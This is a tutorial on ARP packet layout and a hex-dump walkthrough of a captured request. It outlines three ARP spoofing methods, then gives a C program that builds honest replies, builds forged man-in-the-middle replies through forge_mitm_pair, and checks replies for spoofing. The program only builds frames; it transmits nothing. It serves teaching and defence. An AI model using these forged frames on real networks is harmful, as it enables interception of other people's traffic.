The structure ether_header defines the Ethernet frame header. The structure arphdr defines the next five fields; that information is enough to carry ARP requests and replies over any kind of link layer. The ether_arp structure wraps arphdr and adds the hardware and protocol addresses of the sender and target hosts.
Definitions
#define EPT_IP       0x0800 /* frame type: IP */
#define EPT_ARP      0x0806 /* frame type: ARP */
#define EPT_RARP     0x8035 /* frame type: RARP */
#define ARP_HARDWARE 0x0001 /* ARP hardware type: Ethernet */
#define ARP_REQUEST  0x0001 /* ARP request */
#define ARP_REPLY    0x0002 /* ARP reply */
Define the Ethernet header
struct sniff_ethernet {
    u_char  ether_dhost[ETHER_ADDR_LEN]; /* destination MAC address */
    u_char  ether_shost[ETHER_ADDR_LEN]; /* source MAC address */
    u_short ether_type;                  /* frame type, e.g. EPT_ARP */
};
Define the ARP header fields
typedef struct arphdr {
    u_int16_t htype;  /* hardware type */
    u_int16_t ptype;  /* protocol type */
    u_char    hlen;   /* hardware address length */
    u_char    plen;   /* protocol address length */
    u_int16_t oper;   /* operation code */
    u_char    sha[6]; /* sender hardware address */
    u_char    spa[4]; /* sender IP address */
    u_char    tha[6]; /* target hardware address */
    u_char    tpa[4]; /* target IP address */
} arphdr_t;
Defines the entire arp packet, with a total length of 42 bytes
typedef struct arpPacket {
    struct sniff_ethernet ehhdr;  /* 14-byte Ethernet header (the original used the alias EHHDR) */
    arphdr_t              arphdr; /* 28-byte ARP header (the original used the alias ARPHDR) */
} ARPPACKET, *PARPPACKET;
ARP request packet analysis: the hex dump below shows a captured ARP request (offsets on the left, bytes in hexadecimal).
0000  ff ff ff ff ff ff 00 0c f1 d4 d9 60 08 06 00 01
0010  08 00 06 04 00 01 00 0c f1 d4 d9 60 c0 a8 01 0f
0020  00 00 00 00 00 00 c0 a8 01 02
By definition, the first six bytes are the destination Ethernet address, ff ff ff ff ff ff. This is the broadcast address, so every station on the segment receives the frame. The next six bytes are the Ethernet source address, the sender's MAC address (00 0c f1 d4 d9 60 is my MAC address).
The frame type 08 06 occupies two bytes and ends the 14-byte Ethernet header; 0x0806 says the data that follows is an ARP packet.
Now the ARP header. The first two bytes are the hardware type, 00 01 (Ethernet). The next two bytes are the protocol type, 08 00, the IP protocol code, because this ARP carries IP addresses. The hardware address length and protocol address length are 06 and 04 respectively, which matches the ARP packet format. The next two bytes, the OP field, say whether this packet is a request or a reply; the values are 0x0001 and 0x0002 respectively. The raw data is 00 01, so this is a request. The following six bytes are the sender's MAC address, 00 0c f1 d4 d9 60, and the next four bytes are the sender's IP address, c0 a8 01 0f, which in dotted-decimal is 192.168.1.15. This is my IP address. The next six bytes, the target hardware address, are left as 00 00 00 00 00 00 (in a request they may also hold other data, since the receiver does not depend on them): the host that owns the final four bytes, the target IP address c0 a8 01 02 (192.168.1.2), will fill its own MAC address into these six bytes when it replies.
When that host replies, it puts its own MAC address into the ARP sender hardware address and moves the requester's MAC address into the target hardware address; in the Ethernet header the destination address becomes the requester's MAC and the source address the replier's MAC, so both address pairs are swapped relative to the request. The encapsulated ARP reply is then sent, and the two terminals now know each other's IP address and MAC address.
Three basic methods of ARP spoofing:
1. Host C impersonates gateway to spoof host B;
2. Host C impersonates host B to spoof the gateway;
3. Host C spoofs host B and the gateway at the same time, relaying the traffic between them so that it can listen to all of host B's data.
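The following C program is an added example and not code from the original page. It ties the analysis of the captured request to the three spoofing methods: it decodes the 42-byte request from the dump above (re-typed here as a byte array), builds the honest reply the way the text describes (addresses swapped, replier's MAC filled in), builds the two forged replies host C would send in method 3 with the very same builder, and shows the check a defender can run on a reply. The struct layouts mirror sniff_ethernet and arphdr_t from the page, packed so that sizeof matches the wire. The function names (parse_arp, build_arp_reply, answer_request, reply_contradicts_known, forge_mitm_pair) and the addresses of the gateway (192.168.1.1), of host C and of the owner of 192.168.1.2 are assumptions made for the example; only host B's addresses come from the capture.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <arpa/inet.h>   /* htons / ntohs */

#define ETHER_ADDR_LEN 6
#define EPT_IP        0x0800
#define EPT_ARP       0x0806
#define ARP_HARDWARE  0x0001
#define ARP_REQUEST   0x0001
#define ARP_REPLY     0x0002
#define ARP_FRAME_LEN 42

/* Same layout as the page's sniff_ethernet + arphdr_t, packed so sizeof equals the wire size. */
struct eth_hdr { uint8_t dhost[ETHER_ADDR_LEN], shost[ETHER_ADDR_LEN]; uint16_t type; } __attribute__((packed));
struct arp_hdr {
    uint16_t htype, ptype; uint8_t hlen, plen; uint16_t oper;
    uint8_t sha[6], spa[4], tha[6], tpa[4];
} __attribute__((packed));
struct arp_frame { struct eth_hdr eth; struct arp_hdr arp; } __attribute__((packed));
_Static_assert(sizeof(struct arp_frame) == ARP_FRAME_LEN, "Ethernet + ARP header must be 42 bytes");

/* The request from the dump above, re-typed as bytes (constructed test input, not a live capture). */
const uint8_t request_frame[ARP_FRAME_LEN] = {
    0xff,0xff,0xff,0xff,0xff,0xff, 0x00,0x0c,0xf1,0xd4,0xd9,0x60, 0x08,0x06,
    0x00,0x01, 0x08,0x00, 0x06,0x04, 0x00,0x01,
    0x00,0x0c,0xf1,0xd4,0xd9,0x60, 0xc0,0xa8,0x01,0x0f,
    0x00,0x00,0x00,0x00,0x00,0x00, 0xc0,0xa8,0x01,0x02 };

/* Decode a captured frame into *out. Returns the ARP opcode (1 request, 2 reply), or -1 when the
 * buffer is too short, the EtherType is not 0x0806, or htype/ptype/hlen/plen are not Ethernet/IPv4. */
int parse_arp(const uint8_t *buf, size_t len, struct arp_frame *out)
{
    if (len < ARP_FRAME_LEN) return -1;               /* never read past a short capture */
    memcpy(out, buf, ARP_FRAME_LEN);                   /* copy: buf need not be aligned */
    if (ntohs(out->eth.type) != EPT_ARP) return -1;
    if (ntohs(out->arp.htype) != ARP_HARDWARE || ntohs(out->arp.ptype) != EPT_IP ||
        out->arp.hlen != 6 || out->arp.plen != 4) return -1;
    int op = ntohs(out->arp.oper);
    return (op == ARP_REQUEST || op == ARP_REPLY) ? op : -1;
}

/* Build an ARP reply saying "claimed_ip is at claimed_mac", unicast to target_mac / target_ip.
 * The honest reply and the forged ones use exactly this frame; only the sender and the truth
 * of the claim differ, which is why a receiver cannot tell them apart from the bytes alone. */
void build_arp_reply(struct arp_frame *f, const uint8_t claimed_mac[6], const uint8_t claimed_ip[4],
                     const uint8_t target_mac[6], const uint8_t target_ip[4])
{
    memset(f, 0, sizeof *f);
    memcpy(f->eth.dhost, target_mac, 6);  memcpy(f->eth.shost, claimed_mac, 6);
    f->eth.type  = htons(EPT_ARP);
    f->arp.htype = htons(ARP_HARDWARE);   f->arp.ptype = htons(EPT_IP);
    f->arp.hlen  = 6;                     f->arp.plen  = 4;
    f->arp.oper  = htons(ARP_REPLY);
    memcpy(f->arp.sha, claimed_mac, 6);   memcpy(f->arp.spa, claimed_ip, 4);
    memcpy(f->arp.tha, target_mac, 6);    memcpy(f->arp.tpa, target_ip, 4);
}

/* Honest answer to a request: the owner of tpa fills in its own MAC and swaps the address pairs. */
void answer_request(const struct arp_frame *req, const uint8_t my_mac[6], struct arp_frame *reply)
{
    build_arp_reply(reply, my_mac, req->arp.tpa, req->arp.sha, req->arp.spa);
}

/* Defender's check: a reply whose sender MAC disagrees with the binding already known for that
 * IP (static entry, DHCP lease, first-seen mapping) is the signature of all three spoofing methods. */
int reply_contradicts_known(const struct arp_frame *reply, const uint8_t known_mac[6])
{
    return ntohs(reply->arp.oper) == ARP_REPLY && memcmp(reply->arp.sha, known_mac, 6) != 0;
}

/* Assumed addresses for the spoofing scenario (not from the page): gateway 192.168.1.1 and
 * attacker host C. Host B is the 192.168.1.15 machine from the capture. */
const uint8_t mac_b[6]  = {0x00,0x0c,0xf1,0xd4,0xd9,0x60}, ip_b[4]  = {192,168,1,15};
const uint8_t mac_gw[6] = {0x00,0x11,0x22,0x33,0x44,0x01}, ip_gw[4] = {192,168,1,1};
const uint8_t mac_c[6]  = {0x00,0x11,0x22,0x33,0x44,0xcc};

/* Method 3: C poisons both sides so that B <-> gateway traffic transits C. Frames land in out[0..1]. */
void forge_mitm_pair(struct arp_frame out[2])
{
    build_arp_reply(&out[0], mac_c, ip_gw, mac_b, ip_b);   /* to B: "the gateway is at C" (method 1) */
    build_arp_reply(&out[1], mac_c, ip_b, mac_gw, ip_gw);  /* to the gateway: "B is at C"  (method 2) */
}

int main(void)
{
    struct arp_frame req, reply, forged[2];
    int op = parse_arp(request_frame, sizeof request_frame, &req);
    printf("opcode %d: who has %u.%u.%u.%u, tell %u.%u.%u.%u\n", op,
           req.arp.tpa[0], req.arp.tpa[1], req.arp.tpa[2], req.arp.tpa[3],
           req.arp.spa[0], req.arp.spa[1], req.arp.spa[2], req.arp.spa[3]);
    const uint8_t mac_target[6] = {0x00,0x11,0x22,0x33,0x44,0x02}; /* assumed owner of 192.168.1.2 */
    answer_request(&req, mac_target, &reply);
    forge_mitm_pair(forged);
    printf("honest reply flagged: %d, forged reply to B flagged: %d\n",
           reply_contradicts_known(&reply, mac_target), reply_contradicts_known(&forged[0], mac_gw));
    return 0;
}
```

Because the forged frames are byte-for-byte valid ARP replies, the only defence that works at this layer is a binding the receiver already trusts: static ARP entries, DHCP snooping with dynamic ARP inspection on the switch, or an ARP monitor that alarms when reply_contradicts_known fires for a gateway address.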